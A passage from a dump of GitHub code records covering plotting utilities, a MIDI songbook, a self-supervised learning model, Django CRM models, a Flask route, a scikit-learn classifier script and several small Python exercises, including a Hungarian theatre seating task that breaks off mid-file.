arr[i]:print(i);break","repo_name":"beOk91/baekjoon2","sub_path":"baekjoon2581.py","file_name":"baekjoon2581.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14897538401","text":"import numpy as np\nimport matplotlib.pylab as plt\n\n\n\ndef imshow_color_diff(I, J):\n \"\"\"display I and J images superimposed on different color channels\n \"\"\"\n def norm_01(I):\n return (I - I.min())/I.ptp()\n Ic = np.dstack([norm_01(I)**0.5,\n norm_01(J)**0.5,\n 0.5*np.ones_like(J)])\n plt.imshow(Ic)\n\n\ndef plot_vector_field(points, displacements,\n view_factor=None, color='white'):\n amplitudes = np.sqrt(np.nansum(displacements**2, axis=1))\n\n mask = ~np.any(np.isnan(displacements), axis=1, keepdims=False)\n\n plt.quiver(*points[mask, :].T, *displacements[mask, :].T,\n angles='xy', color='white',\n scale_units='xy',\n units='dots',\n width=1,\n headwidth=3,\n headlength=4, headaxislength=3,\n scale=1/view_factor if view_factor else None,\n minlength=1e-4)\n\n plt.text(10., 10.,\n f'max(|u|)={np.nanmax(amplitudes):.2f}px mean(|u|)={np.nanmean(amplitudes):.2f}px',\n fontsize=12, color=color,\n verticalalignment='top')\n\n # plot NaN points\n plt.plot(points[np.logical_not(mask), 0],\n points[np.logical_not(mask), 1],\n 's', markersize=1, color='yellow', alpha=0.7)\n\n\ndef plot_grid_points(grid, background=None,\n color='white', markersize=3,\n show_pts_number=False,\n window_half_size=None):\n \"\"\"Plot grid points\n\n Parameters\n ----------\n grid : tuple (grid_x, grid_y)\n grid points arrays\n background : 2D array, by default None\n image to draw as a background\n color : str, by default 'white'\n markersize : int, by default 3\n show_pts_number : bool, by default False\n window_half_size : int, by default None\n if not None, draw one corresponding ROI box\n \"\"\"\n if background is not None:\n plt.imshow(background)\n\n plt.plot(*grid, 'o', color=color, markersize=markersize)\n\n if show_pts_number:\n points = np.stack((grid[0].flatten(), grid[1].flatten()),\n axis=-1)\n for k, (x, y) in enumerate(points):\n if len(points) > 10 and k % 5 != 0:\n continue\n text_offset = 10.0\n plt.text(x+text_offset, y+text_offset,\n str(k), fontsize=8, color=color)\n\n # Graph one of the ROI\n if window_half_size:\n box = np.array([[-1, 1, 1, -1, -1],\n [-1, -1, 1, 1, -1]])*(window_half_size + 1)\n middle_point = tuple(np.array(grid[0].shape) // 2 - 1)\n plt.plot(box[0]+grid[0][middle_point], box[1]+grid[1][middle_point],\n color=color, linewidth=1)\n\n\nfrom matplotlib.lines import Line2D\n\ndef plot_trajectories(trajectories, background=None, gaps=None,\n color='black'):\n if background is not None:\n plt.imshow(background, alpha=.4)\n\n for k, xy in enumerate(np.swapaxes(trajectories, 0, 1)):\n plt.plot(*xy[0], 's', color=color, markersize=1)\n plt.plot(*xy.T, '-', linewidth=.5, markersize=2, color=color)\n if k % 5 == 0:\n plt.text(*xy[0], str(k), fontsize=6)\n\n if gaps is not None:\n g = gaps[:, k] \n mask = ~np.isnan(g)\n mask[mask] &= g[mask] > 5\n plt.plot(*xy[1:-1, :][mask, :].T, 'o', markersize=2,\n color='red')\n plt.legend([Line2D([0], [0], linestyle='', marker='o', color='red', markersize=2),], ['gap > 5px', ])\n #plt.axis('equal')\n\n\ndef plot_deformed_mesh(grid, displ_field,\n color_values=None,\n view_factor=10,\n displ_threshold=True, cmap='Spectral'):\n \n if color_values is None:\n color_values = np.zeros_like(grid[0])\n \n # Scale displacements using view_factor\n points = np.stack( (grid[0].flatten(), grid[1].flatten()), axis=-1 )\n positions_amplified = displ_field*view_factor + points\n x_amplified = positions_amplified[:, 0].reshape(grid[0].shape)\n y_amplified = positions_amplified[:, 1].reshape(grid[0].shape)\n\n displ_field_amplified = view_factor * displ_field\n\n # Remove points where displacement > threshold\n if displ_threshold:\n diff_x = np.diff(x_amplified, axis=1, prepend=np.min(x_amplified)-10)\n diff_y = np.diff(y_amplified, axis=0, prepend=np.min(y_amplified)-10)\n displ_x_mask = np.less(diff_x, 0,\n where=~np.isnan(diff_x))\n displ_y_mask = np.less(diff_y, 0,\n where=~np.isnan(diff_y))\n displ_mask = np.logical_or(displ_x_mask, displ_y_mask)\n\n x_amplified[displ_mask] = np.NaN\n y_amplified[displ_mask] = np.NaN\n\n # Background Reference grid:\n moved_out = np.any(np.isnan(displ_field), axis=1).reshape(grid[0].shape)\n ref_colors = np.zeros_like(moved_out)\n ref_colors[moved_out] = 1\n \n # note : pcolormesh doesn't work with NaN\n plt.pcolor(*grid, ref_colors, \n edgecolors='black', linewidth=1, antialiased=True,\n cmap='Reds', alpha=0.1)\n \n\n # Front mesh:\n cs = plt.pcolor(x_amplified, y_amplified, color_values,\n edgecolors='#2b2b2b',\n linewidth=1,\n antialiased=True,\n cmap=cmap)\n cs.cmap.set_over('gray')\n cs.cmap.set_under('gray')\n\n\n plt.annotate(f\"×{view_factor}\", (1, 1), xytext=(-5, -5),\n xycoords='axes fraction', textcoords='offset points',\n fontsize=14, fontweight='bold', ha='right', va='top')\n\n plt.axis('equal')\n plt.xlabel('x [pixel]'); plt.ylabel('y [pixel]'); ","repo_name":"xdze2/stretchablecorr","sub_path":"stretchablecorr/graphplot.py","file_name":"graphplot.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4080330072","text":"import copy\nimport os\nimport numpy as np\nimport mido\n\nclass Songbook(object):\n\n def __init__(self):\n \n self._pieces = {}\n\n def add_new_piece(self, name):\n piece = Piece()\n self._pieces[name] = piece\n return piece\n\n def get_piece(self, name):\n return self._pieces[name]\n\n def remove_piece(self, name):\n del self._pieces[name]\n\n\nclass Piece(object):\n\n NOTES = np.asarray([i for i in range(88)])\n \n def __init__(self, max_len, data=None, midi_path=None):\n\n self._max_len = max_len\n if not data:\n self._data = []\n else:\n if not midi_path:\n self.add_bulk_note_data(data)\n else:\n self.import_midi(midi_path)\n self.scale_data\n\n @property\n def length(self):\n return len(self._data)\n\n @property\n def max_length(self):\n return self._max_len\n \n @property\n def notes(self):\n return [data[0] for data in self._data]\n\n @property\n def scaled_notes(self):\n return [data[0] for data in self._scaled_data]\n\n @property\n def velocities(self):\n return [data[1] for data in self._data]\n\n @property\n def scaled_velocities(self):\n return [data[1] for data in self._scaled_data]\n\n @property\n def times(self):\n return [data[2] for data in self._data]\n\n @property\n def scaled_times(self):\n return [data[2] for data in self._scaled_data]\n\n def copy(self, deep=True):\n if deep:\n return copy.deepcopy(self)\n else:\n return copy.copy(self)\n\n def scale_data(self):\n max_time = max(self.times)\n\n scaled_notes = [(data[0] - 24) / 88 for data in self._data] # subtract 24 because midi keyboard\n scaled_velocities = [data[1] / 127 for data in self._data]\n scaled_times = [data[2] / max_time for data in self._data]\n\n self._scaled_data = list(zip(scaled_notes, scaled_velocities, scaled_times))\n \n def add_note_data(self, note, velocity, time):\n self._data.append((note, velocity, time))\n\n def add_bulk_note_data(self, data):\n self._data.extend(data)\n\n def import_midi(self, midi_path):\n mid = mido.MidiFile(midi_path)\n for track in mid.tracks:\n time = float(0)\n previous = float(0)\n notes = []\n for msg in track:\n time += msg.time\n if not msg.is_meta and msg.type == 'note_on':\n note = msg.bytes()\n note = note[1:3]\n note.append(time - previous)\n previous = time\n notes.append(note)\n\n self.add_bulk_note_data(notes)\n\nif __name__ == '__main__':\n sb = Songbook()\n piece = sb.add_new_piece('test')\n piece.import_midi('../midis/chpn_op27_1_format0.mid')\n \n piece = sb.get_piece('test')\n\n print(len(piece.notes))\n print(max(piece.notes), max(piece.scaled_notes))\n print(max(piece.velocities), max(piece.scaled_velocities))\n print(max(piece.times), max(piece.scaled_times))\n print(min(piece.notes), min(piece.scaled_notes))\n print(min(piece.velocities), min)\n print(min(piece.times))\n \n \n\n\n \n","repo_name":"doneill612/DeepKeysRL","sub_path":"deepkeys/songbook.py","file_name":"songbook.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20260397558","text":"import sys\r\nimport pickle\r\nfrom numpy.random import seed,normal\r\nfrom random import choices\r\nfrom numpy import average,exp\r\nfrom scipy.stats.mstats import mquantiles\r\nfrom numpy.random import normal,seed\r\n\r\n\r\nsys.path.append('c:/analyses/EFA_Productivity_Model.20180929/pyfunctions')\r\nfrom GetParamStats import GetParamValues2 as GetParamValues\r\nfrom GetCoastLength import GetCoastLength\r\n\r\ndef GetCoastLength(pickle_file):\r\n SiteNumber,Sites,VirginSites,CoastLength,timestamp=pickle.load(open(pickle_file,\"rb\"))\r\n return(CoastLength[0]+CoastLength[2]+CoastLength[4]+CoastLength[8]+CoastLength[16])\r\n\r\n \r\n\r\nclass USR2():\r\n def __init__(self, hdf5file,PickleFile,z=4,nquant=1000,burn=0,nthin=None,seed=None):\r\n\r\n self.sdYear=GetParamValues(hdf5file, 'sdYear',burn=burn,nthin=nthin)\r\n self.sdSite=GetParamValues(hdf5file, 'sdSite',burn=burn,nthin=nthin)\r\n n=len(self.sdYear)\r\n self.CoastLength=GetCoastLength(PickleFile)\r\n \r\n vbmass=[GetParamValues(hdf5file, t,burn=burn,nthin=nthin) for t in ['VBmass_0', 'VBmass_2', 'VBmass_4', 'VBmass_8', 'VBmass_16' ] ]\r\n self.vbmass=[ sum([t[i] for t in vbmass] ) for i in range(n) ]\r\n \r\n YearEffect=normal(0,self.sdYear)\r\n SiteEffect=normal(0,self.sdSite)\r\n self.USR21=[exp(-z*t) for t in self.sdYear ]\r\n self.USR22=[self.USR21[i]*self.vbmass[i]/self.CoastLength*exp(SiteEffect[i]+YearEffect[i]) for i in range(n)]\r\n \r\n q=[ (i+.5)/nquant for i in range(nquant)]\r\n result={}\r\n self.qUSR21=mquantiles(self.USR21,prob=q)\r\n self.qUSR22=mquantiles(self.USR22,prob=q)\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n sys.path.append('c:\\\\analyses\\\\EFA_Productivity_Model.20180929\\\\Jervis\\\\NewModel_wideSdYear_WideSiteArea')\r\n from hdf5file import hdf5file,burn,nthin,PickleFile\r\n hdf5file=hdf5file[0]\r\n SiteNumber,Sites,VirginSites,CoastLength,timestamp=pickle.load(open(PickleFile,\"rb\"))\r\n CL=GetCoastLength(PickleFile)\r\n \r\n test=USR2(hdf5file,PickleFile,nquant=1000,burn=burn,nthin=nthin,seed=20200424)\r\n","repo_name":"WayneHajas/Sea-Cucumber-Productivity-Model","sub_path":"USR2_Quantiles.py","file_name":"USR2_Quantiles.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23604121358","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchmetrics.functional import accuracy\n\nimport pytorch_lightning as pl\n\nfrom copy import deepcopy\nfrom typing import Callable, Tuple, Sequence, Union\n\nfrom kornia import augmentation as aug\n\nimport random\n\nclass RandomApply(nn.Module):\n def __init__(self, fn: Callable, p: float):\n super().__init__()\n self.fn = fn\n self.p = p\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n return x if random.random() > self.p else self.fn(x)\n\ndef default_augmentation(image_size: Tuple[int, int] = (32, 32)) -> nn.Module:\n return nn.Sequential(\n # aug.RandomHorizontalFlip(),\n aug.RandomCrop(size=image_size, padding=4, padding_mode='reflect'),\n # aug.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4, hue=0.2),\n # aug.RandomGrayscale(p=0.1),\n )\n\nclass BarlowTwinsLoss(nn.Module):\n def __init__(self, batch_size, lambda_coeff=5e-3, z_dim=128):\n super().__init__()\n\n self.z_dim = z_dim\n self.batch_size = batch_size\n self.lambda_coeff = lambda_coeff\n\n def off_diagonal_ele(self, x):\n n, m = x.shape\n assert n == m\n return x.flatten()[:-1].view(n - 1, n + 1)[:, 1:].flatten()\n\n def forward(self, z1, z2):\n assert z1.shape == z2.shape\n # N x D, where N is the batch size and D is output dim of projection head\n z1_norm = (z1 - torch.mean(z1, dim=0)) / torch.std(z1, dim=0)\n z2_norm = (z2 - torch.mean(z2, dim=0)) / torch.std(z2, dim=0)\n\n # cross_corr = torch.matmul(z1_norm.T, z2_norm) / self.batch_size\n cross_corr = torch.matmul(z1_norm.T, z2_norm) / z1.shape[0]\n\n on_diag = torch.diagonal(cross_corr).add_(-1).pow_(2).sum()\n off_diag = self.off_diagonal_ele(cross_corr).pow_(2).sum()\n\n return on_diag + self.lambda_coeff * off_diag\n\nclass ProjectionHead(nn.Module):\n def __init__(self, input_dim=2048, hidden_dim=2048, output_dim=128):\n super().__init__()\n\n self.projection_head = nn.Sequential(\n nn.Linear(input_dim, hidden_dim, bias=True),\n nn.BatchNorm1d(hidden_dim),\n nn.ReLU(),\n nn.Linear(hidden_dim, output_dim, bias=False),\n )\n\n def forward(self, x):\n return self.projection_head(x)\n\nclass barlowBYOL(pl.LightningModule):\n def __init__(self, \n encoder, \n encoder_out_dim, \n image_size: Tuple[int, int], \n lr=3e-4, \n tau=0.99,\n ):\n \n super().__init__()\n self.augment = default_augmentation(image_size)\n\n self.lr = lr\n self.tau = tau\n\n self.encoder = encoder\n self.projection_head = ProjectionHead(input_dim=encoder_out_dim)\n self._target = None\n\n self.loss = BarlowTwinsLoss(batch_size=16)\n\n @property\n def target(self):\n if self._target is None:\n target_encoder = deepcopy(self.encoder)\n target_projection_head = deepcopy(self.projection_head)\n self._target = nn.Sequential(target_encoder, target_projection_head)\n return self._target\n \n def forward(self, x):\n return self.encoder(x)\n \n def training_step(self, batch, batch_idx):\n x = batch[0]\n\n with torch.no_grad():\n x1, x2 = self.augment(x), self.augment(x)\n target_y = self.target(x2)\n y = self.projection_head(self.encoder(x1))\n\n loss = self.loss(y, target_y)\n self.log(\"train_loss\", loss, on_step=True, on_epoch=False)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x = batch[0]\n\n with torch.no_grad():\n x1, x2 = self.augment(x), self.augment(x)\n target_y = self.target(x2)\n y = self.projection_head(self.encoder(x1))\n\n loss = self.loss(y, target_y)\n\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True)\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n return optimizer\n \n def on_after_backward(self):\n for online_param, target_param in zip(self.encoder.parameters(), self.target[0].parameters()):\n target_param.data = target_param.data * self.tau + online_param.data * (1 - self.tau)\n for online_param, target_param in zip(self.projection_head.parameters(), self.target[1].parameters()):\n target_param.data = target_param.data * self.tau + online_param.data * (1 - self.tau)\n\nclass LinearEvaluationCallback(pl.Callback):\n def __init__(\n self,\n encoder_output_dim: int,\n num_classes: int\n ):\n super().__init__()\n self.optimizer: torch.optim.Optimizer\n\n self.encoder_output_dim = encoder_output_dim\n self.num_classes = num_classes\n\n def on_fit_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):\n pl_module.linear_classifier = nn.Linear(self.encoder_output_dim, self.num_classes).to(pl_module.device)\n self.optimizer = torch.optim.Adam(pl_module.linear_classifier.parameters(), lr=1e-4)\n\n def extract_batch(self, batch: Sequence, device: Union[str, torch.device]):\n x, y = batch\n x = x.to(device)\n y = y.to(device)\n\n return x, y\n \n def on_train_batch_end(\n self,\n trainer: pl.Trainer,\n pl_module: pl.LightningModule,\n outputs: Sequence,\n batch: Sequence,\n batch_idx: int\n ):\n x, y = self.extract_batch(batch, pl_module.device)\n\n with torch.no_grad():\n features = pl_module.forward(x)\n \n features = features.detach()\n preds = pl_module.linear_classifier(features)\n loss = F.cross_entropy(preds, y)\n\n loss.backward()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n pred_labels = torch.argmax(preds, dim=1)\n acc = accuracy(pred_labels, y, task=\"multiclass\", num_classes=10)\n pl_module.log(\"online_train_acc\", acc, on_step=True, on_epoch=False)\n pl_module.log(\"online_train_loss\", loss, on_step=True, on_epoch=False)\n\n def on_validation_batch_end(\n self,\n trainer: pl.Trainer,\n pl_module: pl.LightningModule,\n outputs: Sequence,\n batch: Sequence,\n batch_idx: int\n ):\n x, y = self.extract_batch(batch, pl_module.device)\n\n with torch.no_grad():\n features = pl_module.forward(x)\n \n features = features.detach()\n preds = pl_module.linear_classifier(features)\n loss = F.cross_entropy(preds, y)\n \n pred_labels = torch.argmax(preds, dim=1)\n acc = accuracy(pred_labels, y, task=\"multiclass\", num_classes=10)\n pl_module.log(\"online_val_acc\", acc, on_step=False, on_epoch=True, sync_dist=True)\n pl_module.log(\"online_val_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n","repo_name":"VebjornBerstad/Barlow-twins-BYOL","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39168523390","text":"import os\nimport sys\nimport shutil\nimport pkgutil\nimport platform\nfrom setuptools import setup\nfrom setuptools_rust import RustExtension\n\ndef post_build():\n platform_str = platform.system()\n if platform_str == 'Windows':\n dylib_name = 'libfwnt.dll'\n elif platform_str == 'Linux':\n dylib_name = 'libfwnt.so'\n else:\n raise(Exception(\"{} platform is not handled.\".format(platform_str)))\n\n flag_64x = sys.maxsize > 2**32\n if flag_64x:\n dylib_fullname = os.path.join(\n os.environ['LIBFWNT_BIN64'],\n dylib_name\n )\n else:\n dylib_fullname = os.path.join(\n os.environ['LIBFWNT_BIN32'],\n dylib_name\n )\n\n if not os.path.isfile(dylib_fullname):\n dylib_fullname = os.path.join(\n os.environ['LIBFWNT_BIN'],\n dylib_name\n )\n if not os.path.isfile(dylib_fullname):\n raise(Exception(\"{} not found.\".format(dylib_fullname)))\n\n print(\"found {}\".format(dylib_fullname))\n package_dir = os.path.dirname(pkgutil.get_loader(\"pyrpf\").filename)\n\n print(\"found {}\".format(package_dir))\n dylib_newname = os.path.join(\n package_dir,\n dylib_name\n )\n\n shutil.copyfile(\n dylib_fullname,\n dylib_newname\n )\n\nsetup(\n name='pyrpf',\n version='0.1.0',\n rust_extensions=[\n RustExtension('pyrpf', 'Cargo.toml')\n ],\n zip_safe=False\n)\n\npost_build()\n","repo_name":"forensicmatt/RustyPrefetch","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"35530072424","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nCLIENT_STATUS = [(\"prospect\", \"prospect\"), (\"client\", \"client\")]\n\n\nclass SalesTeamMember(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n employee = models.ForeignKey(to=User,\n default=None,\n on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f\"{self.employee.last_name} {self.employee.first_name}\"\n\n class Meta:\n verbose_name = \"Sales Team Member\"\n\n\nclass SupportTeamMember(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n employee = models.ForeignKey(to=User,\n default=None,\n on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f\"{self.employee.last_name} {self.employee.first_name}\"\n\n class Meta:\n verbose_name = \"Support Team Member\"\n\n\nclass Client(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n first_name = models.CharField('First name', max_length=20)\n last_name = models.CharField('Last name', max_length=20)\n email = models.EmailField()\n phone = models.CharField('Phone', max_length=20)\n mobile = models.CharField('Mobile', max_length=20)\n company_name = models.CharField('Company name', max_length=250)\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n sales_contact = models.ForeignKey(to=SalesTeamMember,\n on_delete=models.CASCADE,\n blank=True,\n null=True\n )\n status = models.CharField(max_length=10,\n choices=CLIENT_STATUS,\n default=\"prospect\")\n\n def __str__(self):\n return f\"{self.last_name} {self.first_name}\"\n\n class Meta:\n ordering = [\"last_name\"]\n\n\nclass Contract(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n sales_contact = models.ForeignKey(to=SalesTeamMember,\n on_delete=models.CASCADE,\n blank=True,\n null=True)\n client = models.ForeignKey(to=Client,\n on_delete=models.PROTECT,\n blank=True,\n null=True,\n related_name=\"contracts\"\n )\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n signed_status = models.BooleanField(null=True)\n amount = models.DecimalField(max_digits=10, decimal_places=2)\n payment_due = models.DateTimeField()\n\n class Meta:\n ordering = [\"client\"]\n\n\nclass EventStatus(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n status = models.CharField(max_length=150)\n notes = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return self.status\n\n class Meta:\n verbose_name = \"Event Status\"\n verbose_name_plural = \"Event Status\"\n\n\nclass Event(models.Model):\n id = models.AutoField(auto_created=True, primary_key=True)\n client = models.ForeignKey(to=Client,\n on_delete=models.PROTECT,\n blank=True,\n null=True)\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n support_contact = models.ForeignKey(to=SupportTeamMember,\n on_delete=models.CASCADE,\n blank=True,\n null=True\n )\n event_status = models.ForeignKey(to=EventStatus,\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n related_name=\"events\"\n )\n attendees = models.IntegerField(blank=True, null=True)\n event_date = models.DateTimeField()\n notes = models.TextField(blank=True)\n\n def __str__(self):\n return f\"Event n° {self.id}\"\n\n class Meta:\n ordering = [\"event_date\"]\n","repo_name":"dardevetdidier/EpicEvent","sub_path":"crm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33723228922","text":"#!/usr/bin/python3\n\"\"\"sorts cities and states from the database\n\"\"\"\n\nfrom flask import Flask, render_template, url_for\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom models.state import State\n\n\napp = Flask(__name__)\n\n\n@app.route('/hbnb_filters', strict_slashes=False)\ndef hbnb_filters():\n \"\"\"filters the states and cities from database\"\"\"\n states = dict(sorted(storage.all(\"State\").items()))\n amenity = dict(sorted(storage.all(\"Amenity\").items()))\n return render_template('10-hbnb_filters.html', title='AirBnB Clone',\n states=states, amenities=amenity)\n\n\n@app.teardown_appcontext\ndef destroy(exception):\n \"\"\"Destroys the connection\"\"\"\n storage.close()\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5000)\n","repo_name":"KingHawkins/AirBnB_clone_v4","sub_path":"web_flask/10-hbnb_filters.py","file_name":"10-hbnb_filters.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73670272747","text":"print('Press 1 for rock, 2 for scissors, 3 for paper')\n\nwhile True:\n\n x = int(input('player 1: '))\n y = int(input('player 2: '))\n dif = x - y\n\n while(x == y):\n x = str(input('player 1: '))\n y = str(input('player 2: '))\n\n if dif in [-1, 2]:\n print('player 1 wins.')\n if str(input('Do you want to play another game, yes or no?\\n')) == 'yes':\n continue\n else:\n print('game over.')\n break\n\n else:\n print('player 2 wins.')\n\n if str(input('Do you want to play another game, yes or no?\\n')) == 'yes':\n continue\n else:\n print('game over.')\n break\n\n","repo_name":"ElusiveFoxie/Python-Random-Scripts","sub_path":"python cwiczenia/zad8.py","file_name":"zad8.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41730172570","text":"hearthstone = 0\nfornite = 0\noverwatch = 0\nothers = 0\n\nsold_games = int(input())\nfor sold_game in range(1, sold_games + 1):\n game_name = input()\n\n if game_name == \"Hearthstone\":\n hearthstone += 1\n elif game_name == \"Fornite\":\n fornite += 1\n elif game_name == \"Overwatch\":\n overwatch += 1\n else:\n others += 1\n\nall_games = hearthstone + fornite + overwatch + others\n\nprint(f\"Hearthstone - {hearthstone / all_games * 100:.2f}%\")\nprint(f\"Fornite - {fornite / all_games * 100:.2f}%\")\nprint(f\"Overwatch - {overwatch / all_games * 100:.2f}%\")\nprint(f\"Others - {others / all_games * 100:.2f}%\")","repo_name":"elenaborisova/Python-Basics","sub_path":"13. Exam Prep Questions/04. SoftUni Past Exams/09. Game Shop.py","file_name":"09. Game Shop.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7831930600","text":"import pandas as pd\nfrom sklearn import svm\nfrom sklearn import neural_network as nn\nimport numpy as np\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle\n\nclass Train_API:\n def __init__(self):\n self.csv = pd.DataFrame()\n\n def save(self, csv):\n self.csv = csv\n\n def everything(self):\n le_dict = {}\n\n # transform categorical columns\n cat_col = ['Name', 'FB Current City', 'LinkedIn 500+?', 'School']\n for column_name in cat_col:\n le = LabelEncoder()\n self.csv[column_name] = le.fit_transform(self.csv[column_name])\n le_dict[column_name] = le\n\n # save label_encoder dictionary in pickle file\n with open('le_dict.pickle', 'wb') as handle:\n pickle.dump(le_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n # split data into 60/40 train-test\n train_df, test_df = tts(self.csv, train_size=.6, test_size=.4)\n\n # save training and test data\n pd.DataFrame.to_csv(train_df, 'csv/train.csv')\n pd.DataFrame.to_csv(test_df, 'csv/test.csv')\n pd.DataFrame.to_csv(self.csv, 'csv/transform.csv')\n return self.classifier()\n\n def classifier(self):\n # Section Classifier.2 - preprocessing\n # load label encoders\n with open('le_dict.pickle', 'rb') as f:\n le_dict = pickle.load(f)\n\n # return label encoder for names\n le = le_dict['Name']\n\n # split test_df and train_df into x and y\n test_df = pd.read_csv('csv/test.csv')\n train_df = pd.read_csv('csv/train.csv')\n transform_df = pd.read_csv('csv/transform.csv')\n test_df_y = test_df['Rich?']\n train_df_y = train_df['Rich?']\n transform_df_y = transform_df['Rich?']\n test_df_x = test_df.drop('Rich?', 1)\n train_df_x = train_df.drop('Rich?', 1)\n transform_df_x = transform_df.drop('Rich?', 1)\n\n # inverse transform name column for test and whole\n reverse_test_names = le.inverse_transform(test_df_x['Name'])\n reverse_test_names_whole = le.inverse_transform(transform_df_x['Name'])\n\n # support vector machine classifier\n clf = svm.SVC()\n clf.fit(train_df_x, train_df_y)\n clf_result = clf.predict(test_df_x)\n clf_result_whole = clf.predict(transform_df_x)\n print ('clf: ', clf.score(transform_df_x, transform_df_y))\n\n # linear SVC\n lin_clf = svm.LinearSVC()\n lin_clf.fit(train_df_x, train_df_y)\n lin_clf_result = lin_clf.predict(test_df_x)\n lin_clf_result_whole = lin_clf.predict(transform_df_x)\n print ('lin_clf: ', lin_clf.score(transform_df_x, transform_df_y))\n\n # MLP (multi-layer perception) Neural Network Classifier\n mlp_clf = nn.MLPClassifier()\n mlp_clf.fit(train_df_x, train_df_y)\n mlp_clf_result = mlp_clf.predict(test_df_x)\n mlp_clf_result_whole = mlp_clf.predict(transform_df_x)\n print ('mlp_clf: ', mlp_clf.score(transform_df_x, transform_df_y))\n\n # clean up result and compare predictions with actual for test\n result = np.vstack((reverse_test_names, clf_result, lin_clf_result, mlp_clf_result, test_df_y)).T\n df_result = pd.DataFrame(result, columns=['Name', 'SVM Pred', 'Linear Pred', 'MLP Pred', 'Actual'])\n df_result = df_result.set_index(df_result['Name'])\n df_result.drop('Name', axis=1, inplace=True)\n print (df_result)\n\n # clean up result and compare predictions with actual for all of mock data\n reverse_test_names = le.inverse_transform(transform_df_x['Name'])\n result = np.vstack((reverse_test_names_whole, clf_result_whole, lin_clf_result_whole,\n mlp_clf_result_whole, transform_df_y)).T\n df_result = pd.DataFrame(result, columns=['Name', 'SVM Pred', 'Linear Pred', 'MLP Pred', 'Actual'])\n df_result = df_result.set_index(df_result['Name'])\n df_result.drop('Name', axis=1, inplace=True)\n print (df_result)\n return df_result\n","repo_name":"yihahe/ieor185","sub_path":"app/train_api.py","file_name":"train_api.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23915868306","text":"# Ladányi Attila\n\n# 1.\n\nfoglaltlista = []\nkategorialista = []\n\nfor i in open(\"foglaltsag.txt\", \"r\", encoding = \"utf-8\"):\n seged = []\n\n for betu in i.strip():\n seged.append(betu)\n\n foglaltlista.append(seged)\n\nfor i in open(\"kategoria.txt\", \"r\", encoding = \"utf-8\"):\n seged = []\n\n for betu in i.strip():\n seged.append(int(betu))\n\n kategorialista.append(seged)\n\n# 2.\n\nprint(\"2. feladat\")\n\nbekersor = int(input(\"Kérem a sor számát: \"))\nbekerszek = int(input(\"Kérem a szék számát: \"))\n\nif foglaltlista[bekersor - 1][bekerszek - 1] == \"x\":\n print(\"A szék már foglalt.\")\nelse:\n print(\"A szék szabad.\")\n\n# 3.\n\nhanyjegyet = 0\n\nfor i in foglaltlista:\n for j in i:\n if j == \"x\":\n hanyjegyet += 1\n\nszazalek = int(round((hanyjegyet / (20 * 15)) * 100, 0))\n\nprint(f\"\\n3. feladat\\nAz előadásra eddig {hanyjegyet} jegyet adtak el, ez a nézőtér {szazalek}%-a.\")\n\n# 4.\n\ntipus = {}\n\nfor sor in range(0, 15):\n for szek in range(0, 20):\n if foglaltlista[sor][szek] == \"x\":\n tipus[kategorialista[sor][szek]] = tipus.get(kategorialista[sor][szek], 0) + 1\n\nlegtobb = [0, 0]\n\nfor i, j in tipus.items():\n if j > legtobb[1]:\n legtobb[0] = i\n legtobb[1] 